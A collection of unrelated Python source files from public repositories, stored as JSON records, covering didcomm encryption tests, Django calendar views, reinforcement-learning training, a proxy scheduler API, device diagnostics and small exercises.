ping: Ping):\n pass\n\n def on_pong(self, pong: Pong):\n pass\n\n def on_close(self, close: Close):\n self.close_reason = close\n self.status = ConnectionStatus.CLOSING\n self.close()\n","repo_name":"Zwork101/Zoey","sub_path":"zoey/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"31852458105","text":"import pandas as pd\n\n# Read data from file 'filename.csv' \n# (in the same directory that your python process is based)\n# Control delimiters, rows, column names with read_csv (see later) \ndata = pd.read_csv(\"coord_1.csv\") \n# Preview the first 5 lines of the loaded data \ndata = pd.DataFrame(data)\n\nfor _, row in data.iterrows():\n rssi = row[\"rssi\"]\n row[\"rssi\"] = rssi * rssi * -1\ndata.to_csv(\"coord_1.csv\")","repo_name":"samlarsen18/lora_project","sub_path":"heap_map/modify_data.py","file_name":"modify_data.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27014221370","text":"import pytest\n\nfrom didcomm.common.algorithms import AuthCryptAlg, AnonCryptAlg\nfrom didcomm.core.utils import is_did_with_uri_fragment\nfrom didcomm.pack_encrypted import pack_encrypted, PackEncryptedConfig\nfrom didcomm.unpack import unpack\nfrom didcomm.protocols.routing.forward import unpack_forward\nfrom tests.test_vectors.common import BOB_DID, ALICE_DID\nfrom tests.test_vectors.didcomm_messages.messages import (\n TEST_MESSAGE,\n minimal_msg,\n attachment_multi_1_msg,\n attachment_json_msg,\n)\nfrom tests.test_vectors.utils import (\n get_key_agreement_methods_in_secrets,\n Person,\n get_key_agreement_methods,\n KeyAgreementCurveType,\n get_auth_methods_in_secrets,\n)\n\nAUTH_ALG_PARAMS = [None, AuthCryptAlg.A256CBC_HS512_ECDH_1PU_A256KW]\nANON_ALG_PARAMS = [\n None,\n AnonCryptAlg.XC20P_ECDH_ES_A256KW,\n AnonCryptAlg.A256GCM_ECDH_ES_A256KW,\n AnonCryptAlg.A256CBC_HS512_ECDH_ES_A256KW,\n]\nSIGN_FRM_PARAMS = [None, ALICE_DID] + [\n vm.id for vm in get_auth_methods_in_secrets(Person.ALICE)\n]\nCURVES_TYPES = [\n KeyAgreementCurveType.X25519,\n KeyAgreementCurveType.P256,\n KeyAgreementCurveType.P521,\n KeyAgreementCurveType.P384,\n]\nMESSAGES = [\n TEST_MESSAGE,\n minimal_msg(),\n attachment_multi_1_msg(),\n attachment_json_msg(),\n]\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\"msg\", MESSAGES)\n@pytest.mark.parametrize(\"auth_alg\", AUTH_ALG_PARAMS)\n@pytest.mark.parametrize(\"anon_alg\", ANON_ALG_PARAMS)\n@pytest.mark.parametrize(\"sign_frm\", SIGN_FRM_PARAMS)\n@pytest.mark.parametrize(\"protect_sender_id\", [True, False])\nasync def test_authcrypt_sender_did_recipient_did(\n msg,\n auth_alg,\n anon_alg,\n sign_frm,\n protect_sender_id,\n resolvers_config_alice,\n resolvers_config_bob,\n resolvers_config_mediator1,\n):\n await check_authcrypt(\n msg=msg,\n frm=ALICE_DID,\n to=BOB_DID,\n sign_frm=sign_frm,\n auth_alg=auth_alg,\n anon_alg=anon_alg,\n protect_sender_id=protect_sender_id,\n resolvers_config_alice=resolvers_config_alice,\n resolvers_config_bob=resolvers_config_bob,\n resolvers_config_mediator1=resolvers_config_mediator1,\n curve_type=KeyAgreementCurveType.X25519, # the first Alice key is X25519\n )\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\"msg\", MESSAGES)\n@pytest.mark.parametrize(\n \"to\",\n [\n vm.id\n for vm in get_key_agreement_methods_in_secrets(\n Person.BOB, KeyAgreementCurveType.X25519\n )\n ],\n)\n@pytest.mark.parametrize(\"auth_alg\", AUTH_ALG_PARAMS)\n@pytest.mark.parametrize(\"anon_alg\", ANON_ALG_PARAMS)\n@pytest.mark.parametrize(\"sign_frm\", SIGN_FRM_PARAMS)\n@pytest.mark.parametrize(\"protect_sender_id\", [True, False])\nasync def test_authcrypt_sender_did_recipient_kid(\n msg,\n to,\n auth_alg,\n anon_alg,\n sign_frm,\n protect_sender_id,\n resolvers_config_alice,\n resolvers_config_bob,\n resolvers_config_mediator1,\n):\n await check_authcrypt(\n msg=msg,\n frm=ALICE_DID,\n to=to,\n sign_frm=sign_frm,\n auth_alg=auth_alg,\n anon_alg=anon_alg,\n protect_sender_id=protect_sender_id,\n resolvers_config_alice=resolvers_config_alice,\n resolvers_config_bob=resolvers_config_bob,\n resolvers_config_mediator1=resolvers_config_mediator1,\n curve_type=KeyAgreementCurveType.X25519,\n )\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\"msg\", MESSAGES)\n@pytest.mark.parametrize(\"curve_type\", CURVES_TYPES)\n@pytest.mark.parametrize(\"auth_alg\", AUTH_ALG_PARAMS)\n@pytest.mark.parametrize(\"anon_alg\", ANON_ALG_PARAMS)\n@pytest.mark.parametrize(\"sign_frm\", SIGN_FRM_PARAMS)\n@pytest.mark.parametrize(\"protect_sender_id\", [True, False])\nasync def test_authcrypt_sender_kid_recipient_did(\n msg,\n curve_type,\n auth_alg,\n anon_alg,\n sign_frm,\n protect_sender_id,\n resolvers_config_alice,\n resolvers_config_bob,\n resolvers_config_mediator1,\n):\n for frm in [\n vm.id for vm in get_key_agreement_methods_in_secrets(Person.ALICE, curve_type)\n ]:\n await check_authcrypt(\n msg=msg,\n frm=frm,\n to=BOB_DID,\n sign_frm=sign_frm,\n auth_alg=auth_alg,\n anon_alg=anon_alg,\n protect_sender_id=protect_sender_id,\n resolvers_config_alice=resolvers_config_alice,\n resolvers_config_bob=resolvers_config_bob,\n resolvers_config_mediator1=resolvers_config_mediator1,\n curve_type=curve_type,\n )\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\"msg\", MESSAGES)\n@pytest.mark.parametrize(\"curve_type\", CURVES_TYPES)\n@pytest.mark.parametrize(\"auth_alg\", AUTH_ALG_PARAMS)\n@pytest.mark.parametrize(\"anon_alg\", ANON_ALG_PARAMS)\n@pytest.mark.parametrize(\"sign_frm\", SIGN_FRM_PARAMS)\n@pytest.mark.parametrize(\"protect_sender_id\", [True, False])\nasync def test_authcrypt_sender_kid_recipient_kid(\n msg,\n curve_type,\n auth_alg,\n anon_alg,\n sign_frm,\n protect_sender_id,\n resolvers_config_alice,\n resolvers_config_bob,\n resolvers_config_mediator1,\n):\n for frm in [\n vm.id for vm in get_key_agreement_methods_in_secrets(Person.ALICE, curve_type)\n ]:\n for to in [\n vm.id for vm in get_key_agreement_methods_in_secrets(Person.BOB, curve_type)\n ]:\n await check_authcrypt(\n msg=msg,\n frm=frm,\n to=to,\n sign_frm=sign_frm,\n auth_alg=auth_alg,\n anon_alg=anon_alg,\n protect_sender_id=protect_sender_id,\n resolvers_config_alice=resolvers_config_alice,\n resolvers_config_bob=resolvers_config_bob,\n resolvers_config_mediator1=resolvers_config_mediator1,\n curve_type=curve_type,\n )\n\n\nasync def check_authcrypt(\n msg,\n frm,\n to,\n sign_frm,\n auth_alg,\n anon_alg,\n protect_sender_id,\n resolvers_config_alice,\n resolvers_config_bob,\n resolvers_config_mediator1,\n curve_type,\n):\n pack_config = PackEncryptedConfig(protect_sender_id=protect_sender_id)\n if auth_alg:\n pack_config.enc_alg_auth = auth_alg\n if anon_alg:\n pack_config.enc_alg_anon = anon_alg\n pack_result = await pack_encrypted(\n resolvers_config=resolvers_config_alice,\n message=msg,\n frm=frm,\n to=to,\n sign_frm=sign_frm,\n pack_config=pack_config,\n )\n\n expected_to = [to]\n if not is_did_with_uri_fragment(to):\n expected_to = [\n vm.id for vm in get_key_agreement_methods(Person.BOB, curve_type)\n ]\n\n expected_frm = frm\n if not is_did_with_uri_fragment(frm):\n expected_frm = get_key_agreement_methods_in_secrets(Person.ALICE)[0].id\n\n expected_sign_frm = None\n if sign_frm is not None and sign_frm != ALICE_DID:\n expected_sign_frm = sign_frm\n if sign_frm == ALICE_DID:\n expected_sign_frm = get_auth_methods_in_secrets(Person.ALICE)[0].id\n\n assert pack_result.from_kid == expected_frm\n assert pack_result.to_kids == expected_to\n assert pack_result.sign_from_kid == expected_sign_frm\n assert pack_result.packed_msg is not None\n\n forward_bob = await unpack_forward(\n resolvers_config_mediator1, pack_result.packed_msg, True\n )\n # TODO ??? might need some checks against forward unpack result\n # (but it's actually out of current test case scope)\n\n unpack_res = await unpack(\n resolvers_config=resolvers_config_bob, packed_msg=forward_bob.forwarded_msg\n )\n\n expected_alg = auth_alg or AuthCryptAlg.A256CBC_HS512_ECDH_1PU_A256KW\n expected_anon_alg = anon_alg or AnonCryptAlg.XC20P_ECDH_ES_A256KW\n if not protect_sender_id:\n expected_anon_alg = None\n assert unpack_res.message == msg\n assert unpack_res.metadata.enc_alg_anon == expected_anon_alg\n assert unpack_res.metadata.enc_alg_auth == expected_alg\n assert unpack_res.metadata.anonymous_sender == protect_sender_id\n assert unpack_res.metadata.encrypted\n assert unpack_res.metadata.non_repudiation == (sign_frm is not None)\n assert not unpack_res.metadata.re_wrapped_in_forward\n assert unpack_res.metadata.authenticated\n","repo_name":"sicpa-dlab/didcomm-python","sub_path":"tests/unit/pack_encrypted/test_pack_auth_encrypted.py","file_name":"test_pack_auth_encrypted.py","file_ext":"py","file_size_in_byte":8243,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"6375034967","text":"import time\r\nimport random\r\nclass Diction:\r\n __database={'@auther':'cqs',}\r\n def __init__(self):\r\n self.__database={'@auther':'cqs','@time':time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())}\r\n print('you can add(words) an check history using show()')\r\n print(self.__database)\r\n\r\n def add(self,key,word):\r\n self.__database[key]=word\r\n def showAll(self):\r\n #添加一个页面元素控制\r\n for item in self.__database.items():\r\n print(item)\r\n def review(self,num=3):\r\n words=list(self.__database.keys())\r\n for i in range(num):\r\n word=random.choice(words)\r\n print(word)\r\n while(True):\r\n option=input(\"check:c or skip:s \")\r\n if option.startswith('c') or option.startswith('s'):\r\n break\r\n else:\r\n print(\"argument error\")\r\n \r\n if option.startswith('c'):\r\n print( word,':',self.__database[word])\r\n\r\n\r\nif __name__=='__main__':\r\n d= Diction()\r\n d.add('help','帮助')\r\n d.add('check','查看')\r\n #d.showAll()\r\n d.review()\r\n inp=input(\"showAll? :y/n \")\r\n if inp=='y':\r\n d.showAll()\r\n \r\n \r\n \r\n","repo_name":"Gitcqs/study","sub_path":"dic.py","file_name":"dic.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74271642729","text":"\"\"\"List of django views for planning management\n\n\"\"\"\n# django imports\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.utils.translation import ugettext as _\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\nfrom django.utils import simplejson as json\nfrom django.core.exceptions import ObjectDoesNotExist\n\n# python imports\nimport functools\nfrom datetime import date, datetime, timedelta\nfrom vobject import iCalendar\n\n# app imports\nfrom events.models import When, Who, Event\nfrom pedagogy.models import SubjectModality\nfrom utils.shortcuts import render_to_response\nfrom events.forms import UserEventForm, CampusEventForm, ClassgroupEventForm,\\\nMoveEventForm, ClassgroupSelectorForm, CampusSelectorForm, MySelectorForm\nfrom events.managers import WhenManager\n \ndef is_event_editable(user, when):\n event_type, who = when.event.get_type()\n if event_type == 'classgroup' and\\\n user.get_profile().can_manage_classgroup(who.classgroup.id):\n return True\n if event_type == 'user' and who.user == user:\n return True\n if event_type == 'campus' and\\\n user.get_profile().can_manage_campus(who.campus.id):\n return True\n return False\n \n@login_required\ndef get_planning(request, what=None, what_arg=None, extra_context={}, **kwargs):\n \"\"\"Return the planning for `what`. What determines the method we will use\n to fetch the informations through the model manager.\n\n Special parameters can be set in `extra_parameters`.\n This mainly return the JSON to be parsed by the calendar client.\n\n \"\"\"\n start_date = date.fromtimestamp(int(request.GET[\"start\"]))\n end_date = date.fromtimestamp(int(request.GET[\"end\"]))\n #We don't want people to make too big queries\n\n if (end_date - start_date).days > 50:\n end_date = start_date\n\n # partial to not give the request to the model.\n partial_is_editable = functools.partial(is_event_editable, request.user)\n w = When.objects.user_planning(request.user, what, start_date, end_date,\\\n what_arg)\n if what == \"classgroup\":\n what = \"%s-%s\" % (what, int(what_arg) % 5)\n d = [p.to_fullcalendar_dict(partial_is_editable, what) for p in w]\n return HttpResponse(json.dumps(d))\n\ndef get_ical(request, what=None, what_arg=None, must=True, extra_context={}, **kwargs):\n start_date = date.min\n end_date = date.max\n w = When.objects.user_planning(request.user, what, start_date, end_date,\\\n what_arg)\n cal = iCalendar()\n cal.add('method').value = 'PUBLISH' # IE/Outlook needs this\n for e in w:\n cal.add(e.to_vevent())\n icalstream = cal.serialize()\n response = HttpResponse(icalstream, mimetype='text/calendar')\n if what_arg is None:\n what_arg = \"\"\n response['Filename'] = '%s%s.ics' % (what, what_arg) # IE needs this\n response['Content-Disposition'] = 'attachment; filename=%s' %\\\n response['Filename']\n return response\n\n\n@login_required\ndef list_events(request):\n to_fetch = (\"mandatory\", \"my_user\", \"my_classgroup\", \"my_campus\",\n \"my_university\")\n events = set()\n start_date = datetime.now()\n end_date = datetime.now()+timedelta(days=7)\n for source in to_fetch:\n fetched = When.objects.user_planning(request.user, source,\n start_date, end_date)\n for event in list(fetched):\n event.resource = source\n events = events | set(fetched)\n return render_to_response('list_events.html', {'whens' : events,} , request)\n\n \n\n@login_required\ndef add_event(request, what=None, what_arg=None, extra_context={}, **kwargs):\n if what == \"classgroup\":\n return add_classgroup_event(request)\n if what == \"campus\":\n return add_campus_event(request)\n if what == \"my_user\":\n return add_user_event(request)\n if what == \"my_university\":\n pass\n\n@login_required\ndef add_user_event(request):\n if request.POST:\n form = UserEventForm(data=request.POST, prefix=\"user\")\n if form.is_valid():\n when = form.save()\n who = Who(user=request.user, event=when.event)\n who.save()\n j = when.to_fullcalendar_dict(lambda when:True, \"my_user\")\n return HttpResponse(json.dumps(j))\n else:\n return False\n\n@login_required\ndef move_event(request, when_id):\n if request.POST:\n when = When.objects.get(id=when_id)\n if not is_event_editable(request.user, when):\n return False\n form = MoveEventForm(data=request.POST)\n if form.is_valid():\n offset = timedelta(days=form.cleaned_data['days'],\n minutes=form.cleaned_data['minutes'])\n n_date = when.date + offset\n when.date = n_date\n when.save()\n j = when.to_fullcalendar_dict(lambda when:True, \"moved\")\n return HttpResponse(json.dumps(j))\n else:\n return False\n\n@login_required\ndef resize_event(request, when_id):\n if request.POST:\n when = When.objects.get(id=when_id)\n if not is_event_editable(request.user, when):\n return False\n form = MoveEventForm(data=request.POST)\n if form.is_valid():\n duration = int(form.cleaned_data['days']) * 24 +\\\n int(form.cleaned_data['minutes']) / 60\n when.event.duration = when.event.duration + duration\n when.event.save()\n return HttpResponse(\"ok\")\n else:\n return HttpResponse(\"!ok\")\n\n@login_required\ndef delete_event(request, when_id):\n if request.POST:\n when = When.objects.get(id=when_id)\n if not is_event_editable(request.user, when):\n return HttpResponse(\"!ok\", status=403)\n when.event.delete()\n return HttpResponse(\"ok\")\n return HttpResponse(\"!ok\", status=500)\n\n@login_required\ndef display_calendar(request):\n #Standard forms\n user_form = UserEventForm(prefix=\"user\")\n my_selector_form = MySelectorForm(prefix=\"my_selector\")\n forms = { 'user_form': user_form,}\n selectors = {'my_selector_form': my_selector_form,}\n\n if request.user.get_profile().can_manage_campus():\n forms['campus_form'] = CampusEventForm(prefix=\"campus\",\n user=request.user)\n forms['classgroup_form'] = ClassgroupEventForm(prefix=\"classgroup\",\n user=request.user)\n selectors['campus'] = CampusSelectorForm(\n prefix=\"cmp_selector\", user=request.user)\n selectors['classgroup'] = ClassgroupSelectorForm(\n prefix=\"cg_selector\", user=request.user)\n selectors['my_selector_form'] = MySelectorForm(prefix=\"my_selector\",\n what=[\"my_user\"])\n\n forms.update(selectors)\n return render_to_response('calendar.html', {'forms' : forms,} , request)\n\n \n\n@login_required\ndef display_campus_mgr_calendar(request):\n user_form = UserEventForm(prefix=\"user\")\n my_selector_form = MySelectorForm(prefix=\"my_selector\", what=[\"my_user\"])\n return render_to_response('calendar.html', {\n 'campus_form': campus_form, \n 'user_form': user_form, \n 'classgroup_form': classgroup_form, \n 'classgroup_selector_form': classgroup_selector_form,\n 'campus_selector_form': campus_selector_form,\n 'my_selector_form': my_selector_form,\n }, request)\n\n\n@login_required\ndef add_classgroup_event(request):\n if request.POST:\n form = ClassgroupEventForm(user=request.user, data=request.POST,\n prefix=\"classgroup\")\n when = form.save()\n j = when.to_fullcalendar_dict(lambda when:True, \"classgroup\")\n return HttpResponse(json.dumps(j))\n else:\n return False\n\n@login_required\ndef add_campus_event(request):\n if request.POST:\n form = CampusEventForm(user=request.user, data=request.POST,\n prefix=\"campus\")\n when = form.save()\n j = when.to_fullcalendar_dict(lambda when:True, \"campus\")\n return HttpResponse(json.dumps(j))\n else:\n return False\n\ndef update_event(request, when_id):\n form = None\n when = get_object_or_404(When, pk=when_id)\n event_type, who = when.event.get_type()\n data = {'name' : when.event.name,\n 'date' : when.date.strftime(\"%Y-%m-%d\"),\n 'start_hour' : int(when.date.strftime(\"%H\")),\n 'duration' : int(when.event.duration),\n 'place_text' : when.event.place_text,\n 'force_display' : when.event.force_display,\n }\n if event_type == 'classgroup' and\\\n request.user.get_profile().can_manage_classgroup(who.classgroup.id):\n data.update({'place' : when.event.places.get().id,\n 'classgroup' :\n who.classgroup.id,\n 'modality' : \n when.event.subject_modality.type,\n 'subject' : \n when.event.subject_modality.subject.id, })\n if request.POST:\n form = ClassgroupEventForm(user=request.user, data=request.POST)\n else:\n form = ClassgroupEventForm(user=request.user, initial=data)\n elif event_type == 'user' and\\\n who.user == request.user:\n if request.POST:\n form = UserEventForm(data=request.POST)\n else:\n form = UserEventForm(initial=data)\n elif event_type == 'campus' and\\\n request.user.get_profile().can_manage_cursus(who.campus.id):\n try:\n place_id = when.event.places.get().id\n except ObjectDoesNotExist:\n place_id = None\n data.update({'place' : place_id,\n 'campus' : who.campus.id,\n })\n if request.POST:\n form = CampusEventForm(data=request.POST, user=request.user)\n else:\n form = CampusEventForm(initial=data, user=request.user)\n if request.POST:\n if form.is_valid():\n when = form.save(when)\n j = when.to_fullcalendar_dict(lambda when:True, \"moved\")\n return HttpResponse(json.dumps(j))\n return render_to_response('edit_user_calendar.html', {\n 'form': form,}, request)\n","repo_name":"easytimetable/easytimetable","sub_path":"easytimetable/events/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10199,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"25983093369","text":"# -*- coding: utf-8 -*-\n\"\"\"\nrl core functionality\n\n@author: thomas\n\"\"\"\nimport tensorflow as tf\nimport gym\nimport numpy as np\nimport logging\nfrom BufferWrapper import BufferWrapper # Optional: environment wrapper\nimport mymodule\nimport multiprocessing\nimport Agent\nimport Network\n\nclass Train(object):\n ''' Wraps training '''\n\n def __init__(self,FLAGS):\n self.FLAGS = FLAGS\n self.logger = logging.getLogger(FLAGS.log_name)\n if self.FLAGS.distributed:\n self.cluster = mymodule.make_cluster(self.FLAGS) # make cluster\n\n def run(self):\n ''' Start up all threads ''' \n \n self.T = mymodule.Counter(0)\n self.envs = [BufferWrapper(gym.make(self.FLAGS.game)) for i in range(self.FLAGS.num_agents)] \n \n # Parameter servers\n ps_threads = [multiprocessing.Process(target=ps_thread,args=(self.cluster,k)) for k in range(self.FLAGS.num_ps)]\n for ps in ps_threads:\n ps.daemon = True\n ps.start() \n \n # Agents \n agents = [multiprocessing.Process(target=Agent.run_agent,args=(thread_id,self.envs[thread_id],self.cluster,self.T,self.FLAGS)) \n for thread_id in range(self.FLAGS.num_agents)]\n for agent in agents:\n agent.start()\n \n # Plotting \n if self.FLAGS.show_training:\n self.plotting()\n \n for agent in agents:\n agent.join()\n \n self.logger.info('Finishing training, total steps:{}'.format(self.T.value()))\n\n def plotting(self):\n ''' Visualize environments '''\n while True: \n for env in self.envs:\n env.render()\n\ndef ps_thread(cluster,k):\n server = tf.train.Server(cluster, job_name=\"ps\", task_index=k)\n server.join()\n \n","repo_name":"tmoer/a3c-Tensorflow-OpenAIGym","sub_path":"Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31041901925","text":"def palindrome():\r\n \r\n '''\r\nlargest palindrome of 3 digit product\r\n '''\r\n pal=[]\r\n for x in range(100,999):\r\n for i in range(100,999):\r\n num=str(i*x)\r\n if len(num)==6:\r\n if num[0]==num[-1]and num[1]==num[-2]and num[2] == num[-3]:\r\n pal.append(i*x)\r\n return max(pal)\r\nprint(palindrome())\r\n\r\n","repo_name":"AmsRed/projecteuler","sub_path":"prob 4.py","file_name":"prob 4.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38305421048","text":"import pyudev as udevpy\nimport subprocess as sp\nimport time\nimport os\n\nclass Diagnotics:\n def checkttyUSB0():\n print(\"[LiDAR] Checking LiDAR presence\")\n try:\n context = udevpy.Context()\n dev = udevpy.Device.from_device_file(context, '/dev/ttyUSB0')\n print(\"[LiDAR] LiDar Present\")\n print(\"[LiDAR] Device Name = \" + dev.sys_name)\n return True\n except Exception as e:\n # We weren't able to use pyudev (possibly because of an invalid operating system)\n print(\"[WARNING] LiDAR Not Present - \" + str(e))\n return False\n return False\n\n def checkttyACM0():\n print(\"[Arduino] Checking Arduino presence\")\n try:\n context = udevpy.Context()\n dev = udevpy.Device.from_device_file(context, '/dev/ttyArduinoProgram')\n print(\"[Arduino] Arduino Present\")\n print(\"[Arduino] Device Name = \" + dev.sys_name)\n return True\n except Exception as e:\n # We weren't able to use pyudev (possibly because of an invalid operating system)\n print(\"[WARNING] Arduino Not Present - \" + str(e))\n print(e)\n return False\n return False\n\n def checkSensorNode ():\n print(\"[Arduino] Checking Arduino Sensor Node presence\")\n try:\n context = udevpy.Context()\n dev = udevpy.Device.from_device_file(context, '/dev/ttySensorNode')\n print(\"[Arduino] Arduino Sensor Node Present\")\n print(\"[Arduino] Device Name = \" + dev.sys_name)\n return True\n except Exception as e:\n # We weren't able to use pyudev (possibly because of an invalid operating system)\n print(\"[WARNING] Arduino Sensor Node Not Present - \" + str(e))\n print(e)\n return False\n return False\n\n def checkBluetooth():\n # C8:3F:26:F8:65:E8\n print(\"[Xbox-Controller] Checking Xbox-Controller presence\")\n process = sp.Popen(['hcitool', 'con'], stdout=sp.PIPE, stderr=sp.PIPE)\n out, err = process.communicate()\n if \"C8:3F:26:F8:65:E8\" in out.split():\n print(\"[Xbox-Controller] Xbox-one controller is connected\")\n return True\n else:\n print(\"[Xbox-Controller] Xbox-one controller that is stored is not Found , Other Connected Devices are as below\")\n print(out)\n return False\n return False\n","repo_name":"furhadjidda/astro","sub_path":"raspberry_pi/src/astro_base/script/diagUtil.py","file_name":"diagUtil.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16822586129","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport json\nimport time\nfrom glob import glob\n\nfrom flask import Flask, jsonify, request\nfrom flask_cors import CORS\n\nimport config\nimport scheduler\n\nlogger = config.get_logger()\n\n\ndef main():\n config.check_dir()\n\n # load scheduler\n ps = scheduler.ProxyScheduler()\n\n if len(ps.config_dict) == 0:\n ps.update_subscription()\n\n app = Flask(__name__)\n\n # CORS for debug usage\n # DO NOT use it on a production environment\n # CORS(app)\n\n @app.route(\"/get/proxy_info\")\n def get_ps_info():\n status = \"running\" if ps._server_process is not None else \"stopped\"\n if status == \"running\":\n server_started_time = ps._server_started_time.strftime(\"%Y%m%d-%H:%M:%S\")\n else:\n server_started_time = \"------\"\n remaining_traffic = \"UNKNOWN\" if ps.remaining_traffic_bytes is None else ps.remaining_traffic_bytes\n expiration_date = \"UNKNOWN\" if ps.expiration_date is None else ps.expiration_date\n return jsonify({\n \"status\": status,\n \"listen_on\": \"{}:{}\".format(config.LOCAL_ADDR, config.LOCAL_PORT),\n \"server_started_time\": server_started_time,\n \"running_config\": \"__none__\" if ps.running_name is None else ps.running_name,\n \"remaining_traffic\": remaining_traffic,\n \"expiration_date\": expiration_date,\n })\n\n @app.route(\"/get/proxy_list\")\n def get_name_list():\n name_list = sorted(list(ps.config_dict.keys()))\n return jsonify(name_list)\n\n @app.route(\"/get/proxy_log\")\n def get_proxy_log():\n return jsonify({\"log\": ps.get_log()})\n\n @app.route(\"/start_proxy\", methods=[\"GET\"])\n def start_proxy():\n name = request.args.to_dict()['name']\n ps.serve(name)\n \n if ps._server_process is None:\n ret = False\n else:\n ret = True\n return jsonify({\n \"success\": ret,\n })\n\n @app.route(\"/stop_proxy\", methods=[\"GET\"])\n def stop_proxy():\n ps.stop()\n if ps._server_process is None:\n ret = True\n else:\n ret = False\n return jsonify({\n \"success\": ret,\n })\n\n app.run(config.API_SERVER_HOST, config.API_SERVER_PORT)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"atarss/proxy_scheduler","sub_path":"python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37262126113","text":"class node:\n # link is also called pointer\n def __init__(self, data=None, link=None):\n self.data = data\n self.link = link\n\nclass linked_list:\n def __init__(self):\n self.head = None\n\n # function that adds a node at front\n def add_at_front(self, data):\n self.head = node(data=data, link=self.head)\n\n # function to check whether the list is empty\n def is_empty(self):\n return self.head == None\n\n # function to add node at end\n def add_at_end(self, data):\n if not self.head:\n self.head = node(data=data)\n return\n curr = self.head\n while curr.link:\n curr = curr.link\n curr.link = node(data=data)\n\n # function to delete any node\n def delete_node(self, key):\n curr = self.head\n prev = None\n while curr and curr.data != key:\n prev = curr\n curr = curr.link\n if prev is None:\n self.head = curr.link\n elif curr:\n prev.link = curr.link\n curr.link = None\n\n # function to get the last node\n def get_last_node(self):\n temp = self.head\n while temp.link:\n temp = temp.link\n return temp.data\n\n # function to print the list nodes\n def print_list(self):\n node = self.head\n while node != None:\n print(node.data, end=\">>\")\n node = node.link\n\n\n","repo_name":"ebel-frank/python-projects","sub_path":"LinkedList DataStructure.py","file_name":"LinkedList DataStructure.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15028786486","text":"import dbtools\n\ngames = dbtools.load('games')\ncontribs = {}\n\nfor game, data in games.items():\n if 'contributors' in data:\n contributors = data['contributors']\n\n for c in contributors:\n if not c in contribs:\n contribs[c] = 1\n else: contribs[c] += 1\n\nfor c in reversed(sorted(contribs, key=lambda p: contribs[p])):\n print(c)\n \n","repo_name":"strata8/savman-db","sub_path":"list_contribs.py","file_name":"list_contribs.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18111203793","text":"from django.conf import settings\nfrom django.conf.urls.defaults import *\n\nfrom django.contrib import admin\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\nadmin.autodiscover()\nurlpatterns = patterns('django.views.static',\n (r'^%s(?P.*)' % settings.MEDIA_URL[1:], 'serve',\n {'document_root': settings.MEDIA_ROOT}),\n)\n\nif \"tinymce\" in settings.INSTALLED_APPS:\n urlpatterns += patterns('django.views.static',\n (r'^tinymce/', include('tinymce.urls')),)\n\nurlpatterns += staticfiles_urlpatterns()\n\nurlpatterns += patterns('',\n (r'^trad/', include('rosetta.urls')),\n (r'^admin/', include(admin.site.urls)),\n url(r'^', include('chimere.urls', namespace=\"chimere\")),\n)\n","repo_name":"InnovAfrica/nanu-yeggle","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5651511052","text":"from __future__ import print_function\n\nfrom pylearn2.models.s3c import S3C\nfrom pylearn2.models.s3c import E_Step_Scan\nfrom pylearn2.models.s3c import Grad_M_Step\nfrom pylearn2.models.s3c import E_Step\nfrom pylearn2.utils import contains_nan\nfrom theano import function\nimport numpy as np\nfrom theano.compat.six.moves import xrange\nimport theano.tensor as T\nfrom theano import config\n#from pylearn2.utils import serial\n\n\ndef broadcast(mat, shape_0):\n rval = mat\n if mat.shape[0] != shape_0:\n assert mat.shape[0] == 1\n\n rval = np.zeros((shape_0, mat.shape[1]),dtype=mat.dtype)\n\n for i in xrange(shape_0):\n rval[i,:] = mat[0,:]\n\n return rval\n\n\nclass Test_S3C_Inference:\n def setUp(self):\n # Temporarily change config.floatX to float64, as s3c inference\n # tests currently fail due to numerical issues for float32.\n self.prev_floatX = config.floatX\n config.floatX = 'float64'\n\n def tearDown(self):\n # Restore previous value of floatX\n config.floatX = self.prev_floatX\n\n def __init__(self):\n \"\"\" gets a small batch of data\n sets up an S3C model\n \"\"\"\n # We also have to change the value of config.floatX in __init__.\n self.prev_floatX = config.floatX\n config.floatX = 'float64'\n\n try:\n self.tol = 1e-5\n\n #dataset = serial.load('${PYLEARN2_DATA_PATH}/stl10/stl10_patches/data.pkl')\n\n #X = dataset.get_batch_design(1000)\n #X = X[:,0:5]\n\n X = np.random.RandomState([1,2,3]).randn(1000,5)\n\n X -= X.mean()\n X /= 